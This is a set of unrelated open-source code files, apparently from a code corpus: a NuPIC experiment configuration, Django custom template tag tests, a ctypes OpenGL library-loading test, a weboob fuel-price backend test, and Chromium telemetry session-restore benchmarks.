sambitgaan/nupic | tests/swarming/nupic/swarming/experiments/oneField/description.py | 32 | 14387 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""
Template file used by the OPF Experiment Generator to generate the actual
description.py file by replacing $XXXXXXXX tokens with desired values.
This description.py file was generated by:
'/Users/ronmarianetti/nupic/eng/lib/python2.6/site-packages/nupic/frameworks/opf/expGenerator/ExpGenerator.py'
"""
from nupic.frameworks.opf.expdescriptionapi import ExperimentDescriptionAPI
from nupic.frameworks.opf.expdescriptionhelpers import (
updateConfigFromSubConfig,
applyValueGettersToContainer,
DeferredDictLookup)
from nupic.frameworks.opf.clamodelcallbacks import *
from nupic.frameworks.opf.metrics import MetricSpec
from nupic.frameworks.opf.opfutils import (InferenceType,
InferenceElement)
from nupic.support import aggregationDivide
from nupic.frameworks.opf.opftaskdriver import (
IterationPhaseSpecLearnOnly,
IterationPhaseSpecInferOnly,
IterationPhaseSpecLearnAndInfer)
# Model Configuration Dictionary:
#
# Define the model parameters and adjust for any modifications if imported
# from a sub-experiment.
#
# These fields might be modified by a sub-experiment; this dict is passed
# between the sub-experiment and base experiment
#
#
# NOTE: Use of DEFERRED VALUE-GETTERs: dictionary fields and list elements
# within the config dictionary may be assigned futures derived from the
# ValueGetterBase class, such as DeferredDictLookup.
# This facility is particularly handy for enabling substitution of values in
# the config dictionary from other values in the config dictionary, which is
# needed by permutation.py-based experiments. These values will be resolved
# during the call to applyValueGettersToContainer(),
# which we call after the base experiment's config dictionary is updated from
# the sub-experiment. See ValueGetterBase and
# DeferredDictLookup for more details about value-getters.
#
# For each custom encoder parameter to be exposed to the sub-experiment/
# permutation overrides, define a variable in this section, using key names
# beginning with a single underscore character to avoid collisions with
# pre-defined keys (e.g., _dsEncoderFieldName2_N).
#
# Example:
# config = dict(
# _dsEncoderFieldName2_N = 70,
# _dsEncoderFieldName2_W = 5,
# dsEncoderSchema = [
# base=dict(
# fieldname='Name2', type='ScalarEncoder',
# name='Name2', minval=0, maxval=270, clipInput=True,
# n=DeferredDictLookup('_dsEncoderFieldName2_N'),
# w=DeferredDictLookup('_dsEncoderFieldName2_W')),
# ],
# )
# updateConfigFromSubConfig(config)
# applyValueGettersToContainer(config)
config = {
# Type of model that the rest of these parameters apply to.
'model': "CLA",
# Version that specifies the format of the config.
'version': 1,
# Intermediate variables used to compute fields in modelParams and also
# referenced from the control section.
'aggregationInfo': { 'days': 0,
'fields': [ (u'timestamp', 'first'),
(u'gym', 'first'),
(u'consumption', 'mean'),
(u'address', 'first')],
'hours': 0,
'microseconds': 0,
'milliseconds': 0,
'minutes': 0,
'months': 0,
'seconds': 0,
'weeks': 0,
'years': 0},
'predictAheadTime': None,
# Model parameter dictionary.
'modelParams': {
# The type of inference that this model will perform
'inferenceType': 'TemporalNextStep',
'sensorParams': {
# Sensor diagnostic output verbosity control;
# if > 0: sensor region will print out on screen what it's sensing
# at each step 0: silent; >=1: some info; >=2: more info;
# >=3: even more info (see compute() in py/regions/RecordSensor.py)
'verbosity' : 0,
# Example:
# dsEncoderSchema = [
# DeferredDictLookup('__field_name_encoder'),
# ],
#
# (value generated from DS_ENCODER_SCHEMA)
'encoders': {
'consumption': { 'clipInput': True,
'fieldname': u'consumption',
'maxval': 200,
'minval': 0,
'n': 1500,
'name': u'consumption',
'type': 'ScalarEncoder',
'w': 21
},
},
# A dictionary specifying the period for automatically-generated
# resets from a RecordSensor;
#
# None = disable automatically-generated resets (also disabled if
# all of the specified values evaluate to 0).
        # Valid keys are any combination of the following:
# days, hours, minutes, seconds, milliseconds, microseconds, weeks
#
# Example for 1.5 days: sensorAutoReset = dict(days=1,hours=12),
#
# (value generated from SENSOR_AUTO_RESET)
'sensorAutoReset' : None,
},
'spEnable': True,
'spParams': {
# SP diagnostic output verbosity control;
# 0: silent; >=1: some info; >=2: more info;
'spVerbosity' : 0,
'globalInhibition': 1,
# Number of cell columns in the cortical region (same number for
# SP and TP)
# (see also tpNCellsPerCol)
'columnCount': 2048,
'inputWidth': 0,
# SP inhibition control (absolute value);
# Maximum number of active columns in the SP region's output (when
# there are more, the weaker ones are suppressed)
'numActiveColumnsPerInhArea': 40,
'seed': 1956,
# potentialPct
# What percent of the columns's receptive field is available
# for potential synapses. At initialization time, we will
# choose potentialPct * (2*potentialRadius+1)^2
'potentialPct': 0.5,
# The default connected threshold. Any synapse whose
# permanence value is above the connected threshold is
# a "connected synapse", meaning it can contribute to the
# cell's firing. Typical value is 0.10. Cells whose activity
# level before inhibition falls below minDutyCycleBeforeInh
# will have their own internal synPermConnectedCell
# threshold set below this default value.
# (This concept applies to both SP and TP and so 'cells'
# is correct here as opposed to 'columns')
'synPermConnected': 0.1,
'synPermActiveInc': 0.1,
'synPermInactiveDec': 0.01,
},
# Controls whether TP is enabled or disabled;
# TP is necessary for making temporal predictions, such as predicting
# the next inputs. Without TP, the model is only capable of
# reconstructing missing sensor inputs (via SP).
'tpEnable' : True,
'tpParams': {
# TP diagnostic output verbosity control;
# 0: silent; [1..6]: increasing levels of verbosity
# (see verbosity in nupic/trunk/py/nupic/research/TP.py and TP10X*.py)
'verbosity': 0,
# Number of cell columns in the cortical region (same number for
# SP and TP)
# (see also tpNCellsPerCol)
'columnCount': 2048,
# The number of cells (i.e., states), allocated per column.
'cellsPerColumn': 32,
'inputWidth': 2048,
'seed': 1960,
# Temporal Pooler implementation selector (see _getTPClass in
# CLARegion.py).
'temporalImp': 'cpp',
# New Synapse formation count
# NOTE: If None, use spNumActivePerInhArea
#
# TODO: need better explanation
'newSynapseCount': 15,
# Maximum number of synapses per segment
# > 0 for fixed-size CLA
# -1 for non-fixed-size CLA
#
# TODO: for Ron: once the appropriate value is placed in TP
# constructor, see if we should eliminate this parameter from
# description.py.
'maxSynapsesPerSegment': 32,
# Maximum number of segments per cell
# > 0 for fixed-size CLA
# -1 for non-fixed-size CLA
#
# TODO: for Ron: once the appropriate value is placed in TP
# constructor, see if we should eliminate this parameter from
# description.py.
'maxSegmentsPerCell': 128,
# Initial Permanence
# TODO: need better explanation
'initialPerm': 0.21,
# Permanence Increment
'permanenceInc': 0.1,
# Permanence Decrement
# If set to None, will automatically default to tpPermanenceInc
# value.
'permanenceDec' : 0.1,
'globalDecay': 0.0,
'maxAge': 0,
# Minimum number of active synapses for a segment to be considered
# during search for the best-matching segments.
# None=use default
# Replaces: tpMinThreshold
'minThreshold': 12,
# Segment activation threshold.
# A segment is active if it has >= tpSegmentActivationThreshold
# connected synapses that are active due to infActiveState
# None=use default
# Replaces: tpActivationThreshold
'activationThreshold': 16,
'outputType': 'normal',
# "Pay Attention Mode" length. This tells the TP how many new
# elements to append to the end of a learned sequence at a time.
# Smaller values are better for datasets with short sequences,
# higher values are better for datasets with long sequences.
'pamLength': 1,
},
'clParams': {
'regionName' : 'CLAClassifierRegion',
# Classifier diagnostic output verbosity control;
# 0: silent; [1..6]: increasing levels of verbosity
'clVerbosity' : 0,
# This controls how fast the classifier learns/forgets. Higher values
# make it adapt faster and forget older patterns faster.
'alpha': 0.001,
# This is set after the call to updateConfigFromSubConfig and is
# computed from the aggregationInfo and predictAheadTime.
'steps': '1',
},
'trainSPNetOnlyIfRequested': False,
},
}
# end of config dictionary
# Adjust base config dictionary for any modifications if imported from a
# sub-experiment
updateConfigFromSubConfig(config)
# Compute predictionSteps based on the predictAheadTime and the aggregation
# period, which may be permuted over.
if config['predictAheadTime'] is not None:
predictionSteps = int(round(aggregationDivide(
config['predictAheadTime'], config['aggregationInfo'])))
assert (predictionSteps >= 1)
config['modelParams']['clParams']['steps'] = str(predictionSteps)
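# For example (hypothetical values): a predictAheadTime of one hour over a
# 15-minute aggregation period gives predictionSteps == 4, so the classifier
# is asked for predictions 4 aggregated records ahead.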
# Adjust config by applying ValueGetterBase-derived
# futures. NOTE: this MUST be called after updateConfigFromSubConfig() in order
# to support value-getter-based substitutions from the sub-experiment (if any)
applyValueGettersToContainer(config)
control = {
# The environment that the current model is being run in
"environment": 'nupic',
# Input stream specification per py/nupicengine/cluster/database/StreamDef.json.
#
'dataset' : { u'info': u'test_NoProviders',
u'streams': [ { u'columns': [u'*'],
u'info': u'test data',
u'source': u'file://swarming/test_data.csv'}],
u'version': 1},
# Iteration count: maximum number of iterations. Each iteration corresponds
# to one record from the (possibly aggregated) dataset. The task is
# terminated when either number of iterations reaches iterationCount or
# all records in the (possibly aggregated) database have been processed,
# whichever occurs first.
#
# iterationCount of -1 = iterate over the entire dataset
#'iterationCount' : ITERATION_COUNT,
# Metrics: A list of MetricSpecs that instantiate the metrics that are
# computed for this experiment
'metrics':[
MetricSpec(field=u'consumption',
inferenceElement=InferenceElement.prediction,
metric='rmse'),
],
# Logged Metrics: A sequence of regular expressions that specify which of
# the metrics from the Inference Specifications section MUST be logged for
# every prediction. The regex's correspond to the automatically generated
# metric labels. This is similar to the way the optimization metric is
# specified in permutations.py.
'loggedMetrics': ['.*nupicScore.*'],
}
descriptionInterface = ExperimentDescriptionAPI(modelConfig=config,
control=control)
| agpl-3.0 |
ABaldwinHunter/django-clone-classic | tests/template_tests/test_custom.py | 116 | 19622 | from __future__ import unicode_literals
import os
from unittest import skipUnless
from django.template import Context, Engine, TemplateSyntaxError
from django.template.base import Node
from django.template.library import InvalidTemplateLibrary
from django.test import SimpleTestCase
from django.test.utils import extend_sys_path
from django.utils import six
from .templatetags import custom, inclusion
from .utils import ROOT
LIBRARIES = {
'custom': 'template_tests.templatetags.custom',
'inclusion': 'template_tests.templatetags.inclusion',
}
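# The keys above are the names used with {% load %}; passing this dict as
# Engine(libraries=...) maps each name to the module registering its tags.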
class CustomFilterTests(SimpleTestCase):
def test_filter(self):
engine = Engine(libraries=LIBRARIES)
t = engine.from_string("{% load custom %}{{ string|trim:5 }}")
self.assertEqual(
t.render(Context({"string": "abcdefghijklmnopqrstuvwxyz"})),
"abcde"
)
class TagTestCase(SimpleTestCase):
@classmethod
def setUpClass(cls):
cls.engine = Engine(app_dirs=True, libraries=LIBRARIES)
super(TagTestCase, cls).setUpClass()
def verify_tag(self, tag, name):
self.assertEqual(tag.__name__, name)
self.assertEqual(tag.__doc__, 'Expected %s __doc__' % name)
self.assertEqual(tag.__dict__['anything'], 'Expected %s __dict__' % name)
class SimpleTagTests(TagTestCase):
def test_simple_tags(self):
c = Context({'value': 42})
templates = [
('{% load custom %}{% no_params %}', 'no_params - Expected result'),
('{% load custom %}{% one_param 37 %}', 'one_param - Expected result: 37'),
('{% load custom %}{% explicit_no_context 37 %}', 'explicit_no_context - Expected result: 37'),
('{% load custom %}{% no_params_with_context %}',
'no_params_with_context - Expected result (context value: 42)'),
('{% load custom %}{% params_and_context 37 %}',
'params_and_context - Expected result (context value: 42): 37'),
('{% load custom %}{% simple_two_params 37 42 %}', 'simple_two_params - Expected result: 37, 42'),
('{% load custom %}{% simple_one_default 37 %}', 'simple_one_default - Expected result: 37, hi'),
('{% load custom %}{% simple_one_default 37 two="hello" %}',
'simple_one_default - Expected result: 37, hello'),
('{% load custom %}{% simple_one_default one=99 two="hello" %}',
'simple_one_default - Expected result: 99, hello'),
('{% load custom %}{% simple_one_default 37 42 %}',
'simple_one_default - Expected result: 37, 42'),
('{% load custom %}{% simple_unlimited_args 37 %}', 'simple_unlimited_args - Expected result: 37, hi'),
('{% load custom %}{% simple_unlimited_args 37 42 56 89 %}',
'simple_unlimited_args - Expected result: 37, 42, 56, 89'),
('{% load custom %}{% simple_only_unlimited_args %}', 'simple_only_unlimited_args - Expected result: '),
('{% load custom %}{% simple_only_unlimited_args 37 42 56 89 %}',
'simple_only_unlimited_args - Expected result: 37, 42, 56, 89'),
('{% load custom %}{% simple_unlimited_args_kwargs 37 40|add:2 56 eggs="scrambled" four=1|add:3 %}',
'simple_unlimited_args_kwargs - Expected result: 37, 42, 56 / eggs=scrambled, four=4'),
]
for entry in templates:
t = self.engine.from_string(entry[0])
self.assertEqual(t.render(c), entry[1])
for entry in templates:
t = self.engine.from_string("%s as var %%}Result: {{ var }}" % entry[0][0:-2])
self.assertEqual(t.render(c), "Result: %s" % entry[1])
def test_simple_tag_errors(self):
errors = [
("'simple_one_default' received unexpected keyword argument 'three'",
'{% load custom %}{% simple_one_default 99 two="hello" three="foo" %}'),
("'simple_two_params' received too many positional arguments",
'{% load custom %}{% simple_two_params 37 42 56 %}'),
("'simple_one_default' received too many positional arguments",
'{% load custom %}{% simple_one_default 37 42 56 %}'),
("'simple_unlimited_args_kwargs' received some positional argument(s) after some keyword argument(s)",
'{% load custom %}{% simple_unlimited_args_kwargs 37 40|add:2 eggs="scrambled" 56 four=1|add:3 %}'),
("'simple_unlimited_args_kwargs' received multiple values for keyword argument 'eggs'",
'{% load custom %}{% simple_unlimited_args_kwargs 37 eggs="scrambled" eggs="scrambled" %}'),
]
for entry in errors:
with self.assertRaisesMessage(TemplateSyntaxError, entry[0]):
self.engine.from_string(entry[1])
for entry in errors:
with self.assertRaisesMessage(TemplateSyntaxError, entry[0]):
self.engine.from_string("%s as var %%}" % entry[1][0:-2])
def test_simple_tag_escaping_autoescape_off(self):
c = Context({'name': "Jack & Jill"}, autoescape=False)
t = self.engine.from_string("{% load custom %}{% escape_naive %}")
self.assertEqual(t.render(c), "Hello Jack & Jill!")
def test_simple_tag_naive_escaping(self):
c = Context({'name': "Jack & Jill"})
t = self.engine.from_string("{% load custom %}{% escape_naive %}")
self.assertEqual(t.render(c), "Hello Jack & Jill!")
def test_simple_tag_explicit_escaping(self):
# Check we don't double escape
c = Context({'name': "Jack & Jill"})
t = self.engine.from_string("{% load custom %}{% escape_explicit %}")
self.assertEqual(t.render(c), "Hello Jack & Jill!")
def test_simple_tag_format_html_escaping(self):
# Check we don't double escape
c = Context({'name': "Jack & Jill"})
t = self.engine.from_string("{% load custom %}{% escape_format_html %}")
self.assertEqual(t.render(c), "Hello Jack & Jill!")
def test_simple_tag_registration(self):
# Test that the decorators preserve the decorated function's docstring, name and attributes.
self.verify_tag(custom.no_params, 'no_params')
self.verify_tag(custom.one_param, 'one_param')
self.verify_tag(custom.explicit_no_context, 'explicit_no_context')
self.verify_tag(custom.no_params_with_context, 'no_params_with_context')
self.verify_tag(custom.params_and_context, 'params_and_context')
self.verify_tag(custom.simple_unlimited_args_kwargs, 'simple_unlimited_args_kwargs')
self.verify_tag(custom.simple_tag_without_context_parameter, 'simple_tag_without_context_parameter')
def test_simple_tag_missing_context(self):
# The 'context' parameter must be present when takes_context is True
msg = (
"'simple_tag_without_context_parameter' is decorated with "
"takes_context=True so it must have a first argument of 'context'"
)
with self.assertRaisesMessage(TemplateSyntaxError, msg):
self.engine.from_string('{% load custom %}{% simple_tag_without_context_parameter 123 %}')
class InclusionTagTests(TagTestCase):
def test_inclusion_tags(self):
c = Context({'value': 42})
templates = [
('{% load inclusion %}{% inclusion_no_params %}', 'inclusion_no_params - Expected result\n'),
('{% load inclusion %}{% inclusion_one_param 37 %}', 'inclusion_one_param - Expected result: 37\n'),
('{% load inclusion %}{% inclusion_explicit_no_context 37 %}',
'inclusion_explicit_no_context - Expected result: 37\n'),
('{% load inclusion %}{% inclusion_no_params_with_context %}',
'inclusion_no_params_with_context - Expected result (context value: 42)\n'),
('{% load inclusion %}{% inclusion_params_and_context 37 %}',
'inclusion_params_and_context - Expected result (context value: 42): 37\n'),
('{% load inclusion %}{% inclusion_two_params 37 42 %}',
'inclusion_two_params - Expected result: 37, 42\n'),
(
'{% load inclusion %}{% inclusion_one_default 37 %}',
'inclusion_one_default - Expected result: 37, hi\n'
),
('{% load inclusion %}{% inclusion_one_default 37 two="hello" %}',
'inclusion_one_default - Expected result: 37, hello\n'),
('{% load inclusion %}{% inclusion_one_default one=99 two="hello" %}',
'inclusion_one_default - Expected result: 99, hello\n'),
('{% load inclusion %}{% inclusion_one_default 37 42 %}',
'inclusion_one_default - Expected result: 37, 42\n'),
('{% load inclusion %}{% inclusion_unlimited_args 37 %}',
'inclusion_unlimited_args - Expected result: 37, hi\n'),
('{% load inclusion %}{% inclusion_unlimited_args 37 42 56 89 %}',
'inclusion_unlimited_args - Expected result: 37, 42, 56, 89\n'),
('{% load inclusion %}{% inclusion_only_unlimited_args %}',
'inclusion_only_unlimited_args - Expected result: \n'),
('{% load inclusion %}{% inclusion_only_unlimited_args 37 42 56 89 %}',
'inclusion_only_unlimited_args - Expected result: 37, 42, 56, 89\n'),
('{% load inclusion %}{% inclusion_unlimited_args_kwargs 37 40|add:2 56 eggs="scrambled" four=1|add:3 %}',
'inclusion_unlimited_args_kwargs - Expected result: 37, 42, 56 / eggs=scrambled, four=4\n'),
]
for entry in templates:
t = self.engine.from_string(entry[0])
self.assertEqual(t.render(c), entry[1])
def test_inclusion_tag_errors(self):
errors = [
("'inclusion_one_default' received unexpected keyword argument 'three'",
'{% load inclusion %}{% inclusion_one_default 99 two="hello" three="foo" %}'),
("'inclusion_two_params' received too many positional arguments",
'{% load inclusion %}{% inclusion_two_params 37 42 56 %}'),
("'inclusion_one_default' received too many positional arguments",
'{% load inclusion %}{% inclusion_one_default 37 42 56 %}'),
("'inclusion_one_default' did not receive value(s) for the argument(s): 'one'",
'{% load inclusion %}{% inclusion_one_default %}'),
("'inclusion_unlimited_args' did not receive value(s) for the argument(s): 'one'",
'{% load inclusion %}{% inclusion_unlimited_args %}'),
(
"'inclusion_unlimited_args_kwargs' received some positional argument(s) "
"after some keyword argument(s)",
'{% load inclusion %}{% inclusion_unlimited_args_kwargs 37 40|add:2 eggs="boiled" 56 four=1|add:3 %}',
),
("'inclusion_unlimited_args_kwargs' received multiple values for keyword argument 'eggs'",
'{% load inclusion %}{% inclusion_unlimited_args_kwargs 37 eggs="scrambled" eggs="scrambled" %}'),
]
for entry in errors:
with self.assertRaisesMessage(TemplateSyntaxError, entry[0]):
self.engine.from_string(entry[1])
def test_include_tag_missing_context(self):
# The 'context' parameter must be present when takes_context is True
msg = (
"'inclusion_tag_without_context_parameter' is decorated with "
"takes_context=True so it must have a first argument of 'context'"
)
with self.assertRaisesMessage(TemplateSyntaxError, msg):
self.engine.from_string('{% load inclusion %}{% inclusion_tag_without_context_parameter 123 %}')
def test_inclusion_tags_from_template(self):
c = Context({'value': 42})
templates = [
('{% load inclusion %}{% inclusion_no_params_from_template %}',
'inclusion_no_params_from_template - Expected result\n'),
('{% load inclusion %}{% inclusion_one_param_from_template 37 %}',
'inclusion_one_param_from_template - Expected result: 37\n'),
('{% load inclusion %}{% inclusion_explicit_no_context_from_template 37 %}',
'inclusion_explicit_no_context_from_template - Expected result: 37\n'),
('{% load inclusion %}{% inclusion_no_params_with_context_from_template %}',
'inclusion_no_params_with_context_from_template - Expected result (context value: 42)\n'),
('{% load inclusion %}{% inclusion_params_and_context_from_template 37 %}',
'inclusion_params_and_context_from_template - Expected result (context value: 42): 37\n'),
('{% load inclusion %}{% inclusion_two_params_from_template 37 42 %}',
'inclusion_two_params_from_template - Expected result: 37, 42\n'),
('{% load inclusion %}{% inclusion_one_default_from_template 37 %}',
'inclusion_one_default_from_template - Expected result: 37, hi\n'),
('{% load inclusion %}{% inclusion_one_default_from_template 37 42 %}',
'inclusion_one_default_from_template - Expected result: 37, 42\n'),
('{% load inclusion %}{% inclusion_unlimited_args_from_template 37 %}',
'inclusion_unlimited_args_from_template - Expected result: 37, hi\n'),
('{% load inclusion %}{% inclusion_unlimited_args_from_template 37 42 56 89 %}',
'inclusion_unlimited_args_from_template - Expected result: 37, 42, 56, 89\n'),
('{% load inclusion %}{% inclusion_only_unlimited_args_from_template %}',
'inclusion_only_unlimited_args_from_template - Expected result: \n'),
('{% load inclusion %}{% inclusion_only_unlimited_args_from_template 37 42 56 89 %}',
'inclusion_only_unlimited_args_from_template - Expected result: 37, 42, 56, 89\n'),
]
for entry in templates:
t = self.engine.from_string(entry[0])
self.assertEqual(t.render(c), entry[1])
def test_inclusion_tag_registration(self):
# Test that the decorators preserve the decorated function's docstring, name and attributes.
self.verify_tag(inclusion.inclusion_no_params, 'inclusion_no_params')
self.verify_tag(inclusion.inclusion_one_param, 'inclusion_one_param')
self.verify_tag(inclusion.inclusion_explicit_no_context, 'inclusion_explicit_no_context')
self.verify_tag(inclusion.inclusion_no_params_with_context, 'inclusion_no_params_with_context')
self.verify_tag(inclusion.inclusion_params_and_context, 'inclusion_params_and_context')
self.verify_tag(inclusion.inclusion_two_params, 'inclusion_two_params')
self.verify_tag(inclusion.inclusion_one_default, 'inclusion_one_default')
self.verify_tag(inclusion.inclusion_unlimited_args, 'inclusion_unlimited_args')
self.verify_tag(inclusion.inclusion_only_unlimited_args, 'inclusion_only_unlimited_args')
self.verify_tag(inclusion.inclusion_tag_without_context_parameter, 'inclusion_tag_without_context_parameter')
self.verify_tag(inclusion.inclusion_tag_use_l10n, 'inclusion_tag_use_l10n')
self.verify_tag(inclusion.inclusion_unlimited_args_kwargs, 'inclusion_unlimited_args_kwargs')
def test_15070_use_l10n(self):
"""
Test that inclusion tag passes down `use_l10n` of context to the
Context of the included/rendered template as well.
"""
c = Context({})
t = self.engine.from_string('{% load inclusion %}{% inclusion_tag_use_l10n %}')
self.assertEqual(t.render(c).strip(), 'None')
c.use_l10n = True
self.assertEqual(t.render(c).strip(), 'True')
def test_no_render_side_effect(self):
"""
#23441 -- InclusionNode shouldn't modify its nodelist at render time.
"""
engine = Engine(app_dirs=True, libraries=LIBRARIES)
template = engine.from_string('{% load inclusion %}{% inclusion_no_params %}')
count = template.nodelist.get_nodes_by_type(Node)
template.render(Context({}))
self.assertEqual(template.nodelist.get_nodes_by_type(Node), count)
def test_render_context_is_cleared(self):
"""
#24555 -- InclusionNode should push and pop the render_context stack
when rendering. Otherwise, leftover values such as blocks from
extending can interfere with subsequent rendering.
"""
engine = Engine(app_dirs=True, libraries=LIBRARIES)
template = engine.from_string('{% load inclusion %}{% inclusion_extends1 %}{% inclusion_extends2 %}')
self.assertEqual(template.render(Context({})).strip(), 'one\ntwo')
class AssignmentTagTests(TagTestCase):
def test_assignment_tags(self):
c = Context({'value': 42})
t = self.engine.from_string('{% load custom %}{% assignment_no_params as var %}The result is: {{ var }}')
self.assertEqual(t.render(c), 'The result is: assignment_no_params - Expected result')
def test_assignment_tag_registration(self):
# Test that the decorators preserve the decorated function's docstring, name and attributes.
self.verify_tag(custom.assignment_no_params, 'assignment_no_params')
def test_assignment_tag_missing_context(self):
# The 'context' parameter must be present when takes_context is True
msg = (
"'assignment_tag_without_context_parameter' is decorated with "
"takes_context=True so it must have a first argument of 'context'"
)
with self.assertRaisesMessage(TemplateSyntaxError, msg):
self.engine.from_string('{% load custom %}{% assignment_tag_without_context_parameter 123 as var %}')
class TemplateTagLoadingTests(SimpleTestCase):
@classmethod
def setUpClass(cls):
cls.egg_dir = os.path.join(ROOT, 'eggs')
super(TemplateTagLoadingTests, cls).setUpClass()
def test_load_error(self):
msg = (
"Invalid template library specified. ImportError raised when "
"trying to load 'template_tests.broken_tag': cannot import name "
"'?Xtemplate'?"
)
with six.assertRaisesRegex(self, InvalidTemplateLibrary, msg):
Engine(libraries={
'broken_tag': 'template_tests.broken_tag',
})
def test_load_error_egg(self):
egg_name = '%s/tagsegg.egg' % self.egg_dir
msg = (
"Invalid template library specified. ImportError raised when "
"trying to load 'tagsegg.templatetags.broken_egg': cannot "
"import name '?Xtemplate'?"
)
with extend_sys_path(egg_name):
with six.assertRaisesRegex(self, InvalidTemplateLibrary, msg):
Engine(libraries={
'broken_egg': 'tagsegg.templatetags.broken_egg',
})
def test_load_working_egg(self):
ttext = "{% load working_egg %}"
egg_name = '%s/tagsegg.egg' % self.egg_dir
with extend_sys_path(egg_name):
engine = Engine(libraries={
'working_egg': 'tagsegg.templatetags.working_egg',
})
engine.from_string(ttext)
@skipUnless(six.PY3, "Python 3 only -- Python 2 doesn't have annotations.")
def test_load_annotated_function(self):
Engine(libraries={
'annotated_tag_function': 'template_tests.annotated_tag_function',
})
| bsd-3-clause |
lokirius/python-for-android | python3-alpha/python3-src/Lib/ctypes/test/test_find.py | 65 | 2470 | import unittest
import sys
from ctypes import *
from ctypes.util import find_library
from ctypes.test import is_resource_enabled
if sys.platform == "win32":
lib_gl = find_library("OpenGL32")
lib_glu = find_library("Glu32")
lib_gle = None
elif sys.platform == "darwin":
lib_gl = lib_glu = find_library("OpenGL")
lib_gle = None
else:
lib_gl = find_library("GL")
lib_glu = find_library("GLU")
lib_gle = find_library("gle")
## print, for debugging
if is_resource_enabled("printing"):
if lib_gl or lib_glu or lib_gle:
print("OpenGL libraries:")
for item in (("GL", lib_gl),
("GLU", lib_glu),
("gle", lib_gle)):
print("\t", item)
# On some systems, loading the OpenGL libraries needs the RTLD_GLOBAL mode.
class Test_OpenGL_libs(unittest.TestCase):
def setUp(self):
self.gl = self.glu = self.gle = None
if lib_gl:
self.gl = CDLL(lib_gl, mode=RTLD_GLOBAL)
if lib_glu:
self.glu = CDLL(lib_glu, RTLD_GLOBAL)
if lib_gle:
try:
self.gle = CDLL(lib_gle)
except OSError:
pass
if lib_gl:
def test_gl(self):
if self.gl:
self.gl.glClearIndex
if lib_glu:
def test_glu(self):
if self.glu:
self.glu.gluBeginCurve
if lib_gle:
def test_gle(self):
if self.gle:
self.gle.gleGetJoinStyle
##if os.name == "posix" and sys.platform != "darwin":
## # On platforms where the default shared library suffix is '.so',
## # at least some libraries can be loaded as attributes of the cdll
## # object, since ctypes now tries loading the lib again
## # with '.so' appended if the first try fails.
## #
## # Won't work for libc, unfortunately. OTOH, it isn't
## # needed for libc since this is already mapped into the current
## # process (?)
## #
## # On MAC OSX, it won't work either, because dlopen() needs a full path,
## # and the default suffix is either none or '.dylib'.
## class LoadLibs(unittest.TestCase):
## def test_libm(self):
## import math
## libm = cdll.libm
## sqrt = libm.sqrt
## sqrt.argtypes = (c_double,)
## sqrt.restype = c_double
## self.assertEqual(sqrt(2), math.sqrt(2))
if __name__ == "__main__":
unittest.main()
| apache-2.0 |
yannrouillard/weboob | modules/prixcarburants/test.py | 5 | 1088 | # -*- coding: utf-8 -*-
# Copyright(C) 2012 Romain Bignon
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
from weboob.tools.test import BackendTest
class PrixCarburantsTest(BackendTest):
BACKEND = 'prixcarburants'
def test_prixcarburants(self):
products = list(self.backend.search_products('gpl'))
self.assertTrue(len(products) == 1)
prices = list(self.backend.iter_prices(products[0]))
self.backend.fillobj(prices[0])
| agpl-3.0 |
CyanogenMod/android_external_chromium_org | tools/perf/benchmarks/session_restore.py | 8 | 2414 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import tempfile
from measurements import session_restore
from measurements import session_restore_with_url
import page_sets
from profile_creators import small_profile_creator
from telemetry import test
from telemetry.page import profile_generator
class _SessionRestoreTest(test.Test):
@classmethod
def ProcessCommandLineArgs(cls, parser, args):
super(_SessionRestoreTest, cls).ProcessCommandLineArgs(parser, args)
profile_type = 'small_profile'
if not args.browser_options.profile_dir:
profile_dir = os.path.join(tempfile.gettempdir(), profile_type)
if not os.path.exists(profile_dir):
new_args = args.Copy()
new_args.pageset_repeat = 1
new_args.output_dir = profile_dir
profile_generator.GenerateProfiles(
small_profile_creator.SmallProfileCreator, profile_type, new_args)
args.browser_options.profile_dir = os.path.join(profile_dir, profile_type)
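# Rough flow of the above (illustrative comment, not from the original source):
# a cold run without --profile-dir generates a "small_profile" once under the
# system temp directory and reuses it afterwards; an explicit --profile-dir on
# the command line skips generation entirely.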
@test.Disabled('android', 'linux') # crbug.com/325479, crbug.com/381990
class SessionRestoreColdTypical25(_SessionRestoreTest):
tag = 'cold'
test = session_restore.SessionRestore
page_set = page_sets.Typical25PageSet
options = {'cold': True,
'pageset_repeat': 5}
@test.Disabled('android', 'linux') # crbug.com/325479, crbug.com/381990
class SessionRestoreWarmTypical25(_SessionRestoreTest):
tag = 'warm'
test = session_restore.SessionRestore
page_set = page_sets.Typical25PageSet
options = {'warm': True,
'pageset_repeat': 20}
@test.Disabled('android', 'linux') # crbug.com/325479, crbug.com/381990
class SessionRestoreWithUrlCold(_SessionRestoreTest):
"""Measure Chrome cold session restore with startup URLs."""
tag = 'cold'
test = session_restore_with_url.SessionRestoreWithUrl
page_set = page_sets.StartupPagesPageSet
options = {'cold': True,
'pageset_repeat': 5}
@test.Disabled('android', 'linux') # crbug.com/325479, crbug.com/381990
class SessionRestoreWithUrlWarm(_SessionRestoreTest):
"""Measure Chrome warm session restore with startup URLs."""
tag = 'warm'
test = session_restore_with_url.SessionRestoreWithUrl
page_set = page_sets.StartupPagesPageSet
options = {'warm': True,
'pageset_repeat': 10}
| bsd-3-clause |
